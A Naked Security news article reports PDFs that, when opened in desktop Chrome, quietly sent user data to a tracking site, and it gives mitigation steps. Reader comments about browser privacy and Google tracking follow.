Skip to content
Naked Security Naked Security

Data-tracking Chrome flaw triggered by viewing PDFs

Researchers have spotted an unusual ‘trackware’ attack triggered by a viewing a PDF inside the Chrome browser.

Researchers have spotted an unusual ‘trackware’ attack triggered by viewing a PDF inside the Chrome browser.

Security company EdgeSpot said it noticed suspicious PDFs, which seem to have been circulating since 2017, sending HTTP POST traffic to the tracking site readnotify.com.

The behaviour only happened when a user viewed a PDF using desktop Google Chrome – when opened in Adobe Reader the PDF’s behaviour returned to normal.

Data sent included the user’s IP address, the Chrome and OS versions, and the full path of the PDF on their computer.

While not the most fearsome-sounding exploit going, the design is similar to an attack discovered last April (CVE-2018-4993) designed to steal NT Lan Manager (NTLM v2) hashes via the Adobe and Foxit readers.

A second variant of this attack was later discovered by EdgeSpot in November, identified and patched as CVE-2018-15979.

Why would someone be interested in relatively innocuous data?

I’m speculating here, but one possibility might be to test the feasibility of using PDFs in this way in advance of a more significant campaign.

If so, it wasn’t a bad strategy for crawling under the radar in a way that would be harder to pull off when trying the same technique against Adobe Reader. Wrote EdgeSpot:

We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away.

What to do

Until the issue is patched, EdgeSpot’s recommendation is to view PDFs in an application other than Chrome, or even disconnect a computer from the internet when opening PDFs (Chrome on Android isn’t affected as opening PDFs on mobile devices is done through a separate app).

A possible alternative is to change Chrome’s default option of rendering PDFs in the browser so that instead they download for viewing in a separate application such as Adobe Reader. This is done via Settings > Advanced > Content Settings > PDF documents, ticking the option Download PDF files instead of automatically opening them in Chrome.

Note that if you’re running Reader DC on Windows, it might also have installed a separate Chrome extension for opening PDFs. This doesn’t override Chrome’s PDF download/display settings so can be left enabled.

According to EdgeSpot, Google will fix the vulnerability in “late April”, presumably a reference to Chrome 74 due on the 23 April (30 April on Chromebook).

11 Comments

It is not readily apparent (to me) whether a ‘setting’ – such as setting Chrome to download PDFs for viewing instead of automatically opening them within Chrome – is enabled or disabled. There is a button to slide one way or the other, but no way of telling which way is on and which way is off. I think I’ll just go back to using Firefox.

If it is to the right and colored, it is active (on, enabled).
If it is to the left and greyed-out, it is inactive (off, disabled).

Well,well..Another flaw in the system.. I believe that I will switch over to Firefox also..Being less and less protected on these devices, but they ALL want more and more of our personal and private information. Bottom line is America needs to get ahold of what’s ours,,,say “H E double toothpicks to non-Americans and start looking out for the American people. Veteran Todd

IMHO, it’s a pity Chrome isn’t more like Firefox which makes PDF handling very simple (Options > Applications > PDF, click on drop-down arrow for choices).

Why not just block readnotify.com? And don’t forget to send a complaint to abuse@ripe.net letting them know that their client, readnotify.com is collecting data from a spyware campaign. Who is Jerry Sweeney, anyway?

The only company interested in such “innocuous” data is the one collected every last sip of info about everyone, um, the author of the browser. Oh yeah, Google reCaptcha apparently takes a pixel level snapshot of the login pages its on, follows mouseclicks, collects 6 months worth of google’s cookies that may be on the computer. Google’s Android OS captrues adn sells every last footstep and at what exact moment every phone carrier takes. See the excellent NY Times exposé [URI redacted].

Might be time to switch away from the Google product and move at least to the Brave browser version of Chromium..

I’m not going into bat for Google here, but your comments probably need some context:

1. When you visit website X, your browser automatically includes all unexpired cookies previously set by X. The cookies are added to the HTTP headers of the web request. That’s how cookies work. So the fact that a Google web request for a reCAPTCHA page includes Google cookies is neither unusual nor unexpected. The same happens for any website X.

2. The NYT location tracking article you mention specifically deals with apps that you have given “use my location” permission, not with Android (or iOS) itself. You can argue that Google is to blame for making location collection so easy and for taking so long to let you turn location on and off for individual apps after you have installed them, but the article is about apps, primarily on Android but also on iOS.

So the situation is importantly different to what you have suggested.

Cookie collection isn’t Google’s bag alone. It applies everywhere. And location collection isn’t just a trust-Google-or-not thing: you may have dozens of apps collecting the same data and selling it on in dozens of different ways.

Suggestions:

* Turn location off unless you need it. (Saves battery, too!)

* Explicitly log out of websites and online accounts when not using them. 2% security pain for 98% safety gain.

* Delete browser cookies regularly.

This non sense privacy invading techniques are to be forbiden for good and not only to be listed and published ! They creating a end facts so they can do what ever they like ? All of user should be not only aware of the treaths, but acting against active (for this reason i do not let internet on my android smart phone at all) If someone wish to track me he has to do it from GSM provider (so f*** o** internet, we need an independent Android like OS where user has all the controll) ! Google Mastodon does not have rights to invade privacy as he do and not only google does that ! Lately i found out that they couple some services with such doing ! If u block some u dont get the desired result, even if the service does have nothing incommon with particular user interests ! This is nasty and should not be allowed at all !

Let’s not leave this discussion with a common misconception about the location setting, especially at a well respected security company.

Turning it location setting does nothing at all to hide you from Google step by step tracking and other shady players (and making it available for sale).

“Every moment of every day, mobile phone apps collect detailed location data.” – New York Times article from December. (searchable on this phrase)

And in a Fox News article, Tucker Carlson sent a reporter around to landmark places with two Android phones, both without Sim cards and one in airplane mode. When the person returned, he attached both to a device that collected what was being uploaded to Google servers. The one in airplane mode collected it too and sent it back when turned back on!
Search: ‘It Knows When I Got Out of the Car!’: Tucker’s Special Report on How Google’s Tracking”

Read the articles rather than believe a fiction about your privacy being protected when it isn’t.
Finally, if you install a Google app on the iPhone, yes you are compromising that device, but on Apple, you’re not getting baked in Google apps on the device.

Comments are closed.

Subscribe to get the latest updates in your inbox.
Which categories are you interested in?